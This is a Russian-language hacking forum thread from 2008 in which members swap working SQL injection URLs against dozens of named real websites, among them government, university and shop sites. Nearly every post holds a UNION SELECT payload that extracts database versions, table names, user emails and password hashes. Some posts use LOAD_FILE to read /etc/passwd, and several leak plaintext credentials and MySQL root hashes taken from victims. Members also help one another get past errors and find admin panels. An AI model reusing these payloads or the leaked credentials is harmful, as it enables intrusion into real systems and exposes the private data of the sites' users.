vse 4to polu4ilos dostat.. load_file pohody ne pashet (

Dobby007

1. menshe slov, pishi 4etko problemy.

2. .php?article=-1+union+select+1,2,unhex(hex(column_name)), 4,5+from+information_schema.columns+where+table_na me=0x75736572+limit+1,1--

probui etot variant.

3. eta tema ne dla voprosov )

Iceangel_

06.10.2008, 10:42

.gov

http://www.bulacan.gov.ph/newsarticle.php?id=-477+union+select+1,2,3,4,version(),6/*
5.0.45-community-nt
root:*46ADD2D575279110D198F0EBABA2CB760429D593:loc alhost
bulacan-gov:*F1E619E8130B161C9F41F8B876FB4F54AFBC0CBD:loca lhostt

http://www.sisonlgu.gov.ph/announce.php?id=-5+union+select+1,table_name,3,4+from+information_s chema.tables/*
5.0.45-community-nt

http://www.mida.gov.my/en/news/view_news.php?id=-2776+union+select+version(),2,3,4/*
5.0.41-community-nt
root:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378:loc alhost
midaweb:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378: localhost

http://www.eastgrinstead.gov.uk/news/article.php?id=-250+union+select+version()/*
4.0.22-nt-log

$n@ke

06.10.2008, 14:15

edu ,хз баян ли.
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-353+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Username: chipsadmin@localhost
Version: 5.0.51a-3ubuntu5.1-log
Dbname: silverchips

[mychips]
cole.brown@gmail.com:bigfishy
================================================== ==============
http://www.cccc.edu/directory/searchResult.php?search=a&radio=lName&ID=1{SQLINJ}&submit=Submit+Query%3E
Username: theDirectory@localhost
Version: 5.0.51b
Dbname: directory

admin:dir920
msteele:fatcow11

хз куда их тулить((
кто найдет - в личку плз..

mff

06.10.2008, 16:12

Shops:
http://www.footballworldsgame.com/football-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
http://www.rephim.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
http://www.paparazzi-online.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.itube.co.il/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.molecularstation.com/science-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.avbulldogsmedia.ca/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.simpsy.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://ugonet.org/visions/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
http://www.foodtube.nl/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.dev.youedu.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.yesdebtfree.org/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.labaction.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://xianz.com/watch/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://video.polisriwijaya.ac.id/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://ebay4um.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://drlaurafanclub.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.private.canetoad.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.muslimvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.phillipsfoundation.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.theperfectaudition.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.i2hot.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.iamthebestamericanidol.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.rebanada.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.yufcosmetics.org/videofame/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.greenplanet-tv.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.youbechef.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.videoclipromance.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.vacationrentalsbyvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.xoct.in/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://video.breakbeat.com.ua/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.securiteaerienne.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.axsinteractive.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.onlybelieve.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.astroshorts.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.waterandwastewater.com/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.jewtube.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://indostream.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.ripn6.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
http://www.b-roll.net/tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--

mff

06.10.2008, 20:31

Shops:
http://www.spoofedtv.com/ugroups.php?UID=16+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--http://www.molecularstation.com/science-videos/ugroups.php?UID=-471+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5 ,6,7,8,9,10,11,12,13,14,15+from+signup--http://www.gospeltube.com/ugroups.php?UID=10641+UNION+SELECT+1,concat_ws(0x3 a,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+ signup--http://www.footballworldsgame.com/football-videos/ugroups.php?UID=271+UNION+SELECT+1,concat_ws(0x3a, email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+si gnup--http://www.yesdebtfree.org/videos/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,em ail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sign up--http://cctn.org/ugroups.php?UID=69+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--

Argentina Lattin Shop (12296 members)
http://bardhzi.altervista.org/latin.txt

:)

nonamez

06.10.2008, 20:47

Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))

http://www.lzs.lt/?lt=1185259934&article=скуль

Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.

mainyk.lt

Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....

sabe

06.10.2008, 22:17

Erowid.org hacked by VITAL - Самый популярный сайт о накротиках pr 6
http://www.erowid.org//new.php?Y1=99999)+union+select+unhex(hex(version() ))/*
5.0.45-log
http://www.erowid.org/columns/teafaerie/wp-login.php
вот блог, нужно найти в базе таблу, база охретительно-большая..)
у кого чтото получится стучите в аську )

Svali.ru - pr 6
http://www.svali.ru/index.php?index=13&st_cmd=cmn_add&st_id=1698+union+select+1,2,3,4,5,6,table_name,8,9 ,10,11,12,13,14,15,16,17,18+from+information_schem a.tables/*
лог. вывод - 4 ветка.

nonamez
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+version()/*
до конфига базы врятле доберешся... а вот юзеров можно поиметь..
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+concat_ws(0x3a,user,pass)+from+user s/*

http://mainyk.lt/?pageid=20&id=-6013+union+select+version()#
да сайт действительно уязвим.. но чтото странное там творится, сейчас нету времени смотреть детальнее..

Iceangel_

24.10.2008, 21:22

Boston University
http://www.bu.edu/phpbin/news/releases/display.php?id=-1552+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,unhex(hex(version()))/*
PR=8!
там где-то даже админка есть...

Dimi4

24.10.2008, 22:04

http://favicon.yandex.net/favicon/freeware32.ru/ freeware32.ru (89.111.184.177)
Google PR 4 / 10
Яндекс тІЦ 210 (http://knopochka.org.ua/?who=freeware32.ru)
Database Version: 5.0.42
Database name: freeware32
User name: makarich@localhost
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+1,2,3+LIMIT+1,1--
+
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+LOAD_FILE(0x2F6574632F70617 3737764),2,3+LIMIT+1,1--
/etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/share/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/usr/sbin/nologin
mysql:x:60:60:added by portage for mysql:/dev/null:/sbin/nologin
cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin
ftp:x:21:21:added by portage for ftpbase:/home/ftp:/sbin/nologin
proftpd:x:101:407:added by portage for proftpd:/dev/null:/sbin/nologin
apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin
webmaster:x:1000:1000:Yuriy Makaev:/home/webmaster:/bin/bash
dovecot:x:97:97:added by portage for dovecot:/dev/null:/sbin/nologin
rpc:x:111:111:added by portage for portmap:/dev/null:/sbin/nologin
named:x:40:40:added by portage for bind:/etc/bind:/sbin/nologin

Robots.txt: User-agent: *
Disallow: go.php
Disallow: program.php
Disallow: /banners/

Раскрытые пути:
/home/webmaster/www/freeware32.ru/

sabe

24.10.2008, 22:30

Dimi4
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,ta ble_name))),2,3+from+information_schema.tables+lim it+17,1--
таблы..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,us er,password))),2,3+from+mysql.user+limit+1,1--
рут..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,ta ble_name,table_schema))),2,3+from+information_sche ma.columns+where+column_name+like+char(112,97,115, 115,119,111,114,100)+limit+1,1--
таблицы с паролями..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,us ername,user_password))),2,3+from+forum.phpbb_users +limit+2,1--
makarich:$H$93X6wK/iq5UvwhwhZXbbnU.RT7gb0W.

жаль так бы шелл залили..
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,pa ssword))),2,3+from+freeware32.persons+limit+1,1--
пассы юзеров.. хешшированые.
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,pa ssword))),2,3+from+persons+limit+1,1--
http://freeware32.ru/index.php?name=NOD32&program=7+union+select+unhex(hex(concat_ws(0x3a,pa ssword))),2,3+from+admin+limit+1,1--
админ.. кто разшефрует будет хорошо )

а вот и freeware32.ru/admin

Pashkela

25.10.2008, 01:19

мда, там вообще не поймешь что:

Макаев Юрий Александрович:1$MgT.b/LSoOE

и админка все-равно защищена .htaccess

warlok

25.10.2008, 02:45

Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))

Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.

Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....
http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.

keng

25.10.2008, 03:03

http://www.lzs.lt/?lt=1185259934&article=1+union+select+1
user() - lzs@195.14.170.12
database() - lzs
version() - 4.0.18
дальше нет желания ибо геморно.

http://www.lzs.lt/?lt=1185259934&article=1+union+select+concat_ws(0x20,name,pass)+f rom+users+where+id=300/*

Бруть наздоровье.

Iceangel_

25.10.2008, 10:35

продолжаем серию .edu ...
Sioux Falls Seminary(сам не знаю что это значит... =) )
http://www.sfseminary.edu/about/index.php?id=9&entryid=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,ver sion(),15/*
PR=6
4.1.25-Debian_mt1

-----------------------------------------------------------------

Northwest University
http://www.northwestu.edu/calendar/view.php?id=-3151+union+select+1,2,3,concat(user,0x3a,password, 0x3a,host,0x3a,file_priv),5,6,7,8,9,10,11,12+from+ mysql.user/*
PR=6
5.0.45-community-nt
mysql.user
root:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:loc alhost
devin.ellis:*001FD03A448FDAA34AE4EEC54A6269A02931D F74:chilen0:%
dennis.williams:*585198B8A7F5B514497FDE9FC1243891A 80020C8:ba1l3y00:%
odbc:*DBC28C7CE578D4A87947FC392EFE7B9A95D2E88B:%
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:lo calhost
eagle:*B15F472DD2E0C69902402108AA80A721C1EF107F:%
Путь: W:\northwestu\calendar\view.php
-----------------------------------------------------------------

Х.З что...
http://www.art.uiowa.edu/directory.php?id=-44+union+select+1,2,table_name,4,5,6,7,8,9,10,11+f rom+information_schema.tables+limit+18,1/*
PR=6
5.0.26-log
-----------------------------------------------------------------

Тоже х.з что...
https://cat.ipac.caltech.edu/sscconf07/view_abstract.php?id=-85+union+select+1,2,version(),4/*
5.0.27-standard

luz3r

25.10.2008, 18:39

http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,10,12,13,14,15 ,16,17/*
5 поле

Robox

26.10.2008, 10:26

http://www.weightonline.com.au/products.php?pid=-89+UniON+Select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
версия 5.0.45-COMMUNITY
админки не нашёл(

Robox

26.10.2008, 10:30

http://www.winelistaustralia.com.au/wineShow.php?pid=1033'
инклудидтся, только админка прикрыта(

Byrger

26.10.2008, 11:48

А не подскажите...
Можно ли провести тут инъекцию? И в какую сторону копать?
_http://la2.raid.ru/index.php?act=clan_info&id=1

А®ТеS

26.10.2008, 12:26

Разные разности:

http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3 a,user(),database(),version()),3,4,5,6,7,8,9/*
http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x 3a,user(),database(),version()),3,4,5,6,7--
http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4, 5,6,7,8,concat_ws(0x3a,user(),database(),version() ),10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,co ncat_ws(0x3a,user(),database(),version()),6,7,8,9/*
http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,ver sion(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir
http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws( 0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3
http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a ,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_me mber

cash$$$

26.10.2008, 16:52

Magazine

http://online-market.com.ua/stat_info.php?id=99999+union+select+1,version(),3, 4/*

version: 5.0.41-community-log
user: onlinem_user@localhost
database: onlinem_base

http://www.fangoria.com/fearful_feature.php?id=99999'+union+select+1,2,3,4 ,5,6,7,version(),9,10,11,12,13,14,15/*

version: 5.0.22
user: fango_site@localhost
database: joesena_fangoria

Онлайн аукционы

http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,version (),4,5,6,7/*

version: 5.0.45-log
user: u72447@10.10.153.176
database: u72447

http://www.elcom.md/news.php?id=99999+union+select+1,2,version(),4,5,6 ,7/*

version: 5.0.27
user: 17325@localhost
database: 17325

bons

26.10.2008, 16:57

тИЦ = 750

http://rezonans.info/index.php?p=news&nID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

version() - 5.0.45
database() - admin_smi
user() - admin_smi@localhost

--------------------------------------------
тИЦ = 230

http://www.womanineurope.com/beauty/show_fashion.php?cat=news&fnr=-1+union+select+1,version(),user(),4,5,database(),7/*

version() - 4.0.27-max-log
database() - db125240836
user() - dbo125240836@212.227.118.27

--------------------------------------------
http://www.michiganbusiness.us/showcompany.php?id=-1%0Aunion%0Aselect%0A1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52--

version() - 4.0.27-standard
user() - michigan_michiga@localhost
database() - michigan_mbusiness

Sleep

26.10.2008, 17:37

http://www.grably.ru/restaurants?id=9999+union+select+1,2,TABLE_NAME,4, 5,6,7,8,9,0,1,2,3,4,5,6+from+INFORMATION_SCHEMA.TA BLES--

http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--

$p01nt

26.10.2008, 18:25

Цитрус

Компания по разработке сайтов. Уязвимость в их CMS.
Пример:
http://www.citrus-soft.ru/chapter.php?id_chapter=76'&from=m
Панель администратора:
http://www.citrus-soft.ru/admin/login.php

КирИТас

Компания по разработке сайтов.Уязвимость в CMS на сайте.
Пример:
http://www.ciritas.ru/product.php?id=15'
Панель администратора:
http://www.ciritas.ru/admin/login.php

foopi

26.10.2008, 18:26

У меня такая проблема - когда ввожу такую строку
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,passwor d,4,5,6,7+from+members
выдаёт вот такую ошибку - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION'
ОДнако на такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,id,4,5, 6,7+from+members - реагирует нормально. может быть кто-нибудь знает как эту фигню обойти??

foopi

26.10.2008, 19:02

проблему решил!гугл помог. Если кому интересно , составил такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,convert (password+using+cp1251),4,5,6,7+from+members на что получил хэши пользователей)

sabe

26.10.2008, 22:12

foopi
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,table_name,table_schema))),4,5,6 ,7+from+information_schema.columns+where+column_na me+like+char(112,97,115,%20115,119,111,114,100)+li mit+7,1
tables with passwords
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,3,unhex (hex(password)),5,6,7+from+u72447_maillist.phplist _admin+limit+0,1
http://bestwayusa.ru/maillist/admin/?page=configure
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,name,password))),4,5,6,7+from+u7 2447_2.chat_admin+limit+0,1
http://bestwayusa.ru/chatlive/admin
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(username)),unhex(hex(password)),5,6,7+from+deal ers+limit+0,1
http://bestwayusa.ru/dealer_login.php

http://bestwayusa.ru/admin.php

didnt find password in db

foopi

27.10.2008, 01:15

foopi

tables with passwords

http://bestwayusa.ru/maillist/admin/?page=configure

http://bestwayusa.ru/chatlive/admin

http://bestwayusa.ru/dealer_login.php

http://bestwayusa.ru/admin.php

didnt find password in db

Только я одного не могу понять ты эти ссылки сам находиш или через скулю узнаёшь??

sabe

27.10.2008, 02:18

foopi
сам) что там находить то ? по сайту 5 мин полазить ?

Sleep

27.10.2008, 05:52

http://www.sil.org/silepubs/abstract.asp?id=1%27+or+1=@@VERSION--

таблицы:

'dtproperties','bibliography','CountriesList','Cou ntry_Index','Language_Index','LanguagesList','name _index','Serials_Index','Serials_List','SIL_Epubs' ,'subject_code_categories','Subject_index','syscon straints','syssegments'